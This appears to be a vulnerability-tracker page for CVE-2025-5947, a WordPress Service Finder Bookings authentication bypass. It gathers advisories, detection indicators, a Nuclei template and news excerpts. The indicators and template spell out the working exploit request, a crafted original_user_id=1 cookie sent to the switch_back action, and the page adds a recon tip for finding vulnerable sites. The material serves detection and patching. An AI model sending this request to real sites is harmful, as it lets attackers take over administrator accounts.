CVE-2025-5947
published 2025-08-01CVE-2025-5947: The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0…
PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
5.70%
92.0th percentile
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aonetheme | service_finder_bookings | <= 6.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
cookieoriginal_user_id=1
url/wp-admin/admin-ajax.php?action=service_finder_switch_back
path/wp-content/plugins/sf-booking/
sigma
id: CVE-2025-5947
info:
name: Service Finder Bookings - Authentication Bypass
author: sedat4ras
severity: critical
http:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: {{Hostname}}
Cookie: original_user_id=1
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?i)Location:.*\/wp-admin\/'
- type: regex
part: header
regex:
- '(?i)Set-Cookie:.*wordpress_logged_in_'
- type: status
status:
- 301
- 302- →Exploit requests are HTTP GET to /wp-admin/admin-ajax.php with the query parameter switch_back=1 and a manipulated original_user_id cookie value (e.g., =1 for admin). ↗
- →Review access logs for suspicious newly created accounts that may have been added for persistence after exploitation. ↗
- →Presence of the sf-booking plugin directory at /wp-content/plugins/sf-booking/ can be used to identify vulnerable targets via passive recon (publicwww).
- ·The vulnerability only affects Service Finder Bookings plugin versions up to and including 6.0; version 6.1 (released July 17) contains the fix. ↗
- ·Attacker IP addresses used for the campaign are not static; blocklisting the five identified IPs is a partial mitigation only, as attackers can rotate to new ones. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x2xx-4qhp-2vqx: The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including,
ghsa_unreviewed·2025-08-01
CVE-2025-5947 [CRITICAL] CWE-639 GHSA-x2xx-4qhp-2vqx: The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including,
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.
VulnCheck
Authorization Bypass Through User-Controlled Key
vulncheck·2025·CVSS 9.8
CVE-2025-5947 [CRITICAL] Authorization Bypass Through User-Controlled Key
Authorization Bypass Through User-Controlled Key
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.
Affected: aonetheme Service Finder Bookings plugin for WordPress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/blog/2025/10/attackers-actively-exploiting-critical-vulnerability-in-service-fi
No detection rules found.
Nuclei
Service Finder Bookings - Authentication Bypass
nuclei·CVSS 9.8
CVE-2025-5947 [CRITICAL] Service Finder Bookings - Authentication Bypass
Service Finder Bookings - Authentication Bypass
Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
Template:
id: CVE-2025-5947
info:
name: Service Finder Bookings - Authentication Bypass
author: sedat4ras
severity: critical
description: |
Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
impact: |
Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
remediation: |
Bleepingcomputer
Hackers exploit critical auth bypass flaw in JobMonster WordPress theme
blogs_bleepingcomputer·2025-11-04·CVSS 9.8
[CRITICAL] Hackers exploit critical auth bypass flaw in JobMonster WordPress theme
## Hackers exploit critical auth bypass flaw in JobMonster WordPress theme
## Bill Toulas
Threat actors are targeting a critical vulnerability in the JobMonster WordPress theme that allows hijacking of administrator accounts under certain conditions.
The malicious activity was detected by Wordfence, a WordPress security firm, after blocking multiple exploit attempts against its clients over the past 24 hours.
JobMonster, created by NooThemes, is a premium WordPress theme used by job listing sites, recruitment/hiring portals, candidate search tools, etc. The theme has over 5,500 sales on Envato .
The exploited vulnerability is identified as CVE-2025-5397 and has a critical-severity score of 9.8. It is an authentication bypass problem that imapcts all versions of the theme up to 4.8.1.
Bleepingcomputer
Hackers exploit auth bypass in Service Finder WordPress theme
blogs_bleepingcomputer·2025-10-08·CVSS 9.8
[CRITICAL] Hackers exploit auth bypass in Service Finder WordPress theme
## Hackers exploit auth bypass in Service Finder WordPress theme
## Bill Toulas
Threat actors are actively exploiting a critical vulnerability in the Service Finder WordPress theme that allows them to bypass authentication and log in as administrators.
Administrator privileges in WordPress grant full control over content and settings, permission to create accounts, upload PHP files, and export databases.
WordPress plugin security firm Wordfence recorded more than 13,800 exploitation atempts since August 1st.
Service Finder is a premium WordPress theme designed for service directory and job board websites. It supports customer booking, feedback, time slot management, staff management, invoice generation, and a payment system.
The theme has more 6,000 sales on Envato Market , and like
https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793https://www.wordfence.com/threat-intel/vulnerabilities/id/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cvehttps://www.vicarius.io/vsociety/posts/cve-2025-5947-detect-wordpress-vulnerabilityhttps://www.vicarius.io/vsociety/posts/cve-2025-5947-mitigate-wordpress-vulnerability
2025-08-01
Published
Exploited in the wild